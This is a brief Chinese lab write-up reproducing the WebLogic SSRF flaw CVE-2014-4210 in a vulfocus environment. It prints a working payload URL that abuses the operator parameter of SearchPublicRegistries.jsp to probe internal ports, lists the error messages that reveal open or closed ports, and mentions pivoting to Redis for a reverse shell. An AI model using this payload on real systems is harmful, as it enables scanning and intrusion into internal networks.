事项 | 描述 |
---|---|
漏洞概述 | 探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。路径是uddiexplorer/SearchPublicRegistries.jsp |
影响范围 | 10.0.2 – 10.3.6 |
漏洞编号 | CVE-2014-4210 |
这里使用vulfocus进行复现。
访问http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp,发现需要登录,作罢。
构造恶意payload,查看7001端口是否开放(默认的weblogic端口)
http://192.168.146.167:29194/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
发现当内网存在该资源的时候,其特征是
weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found). Please ensure that your URL is correct, and the web service has deployed without error.
而不存在该资源的时候,其特征是
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '6379'
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。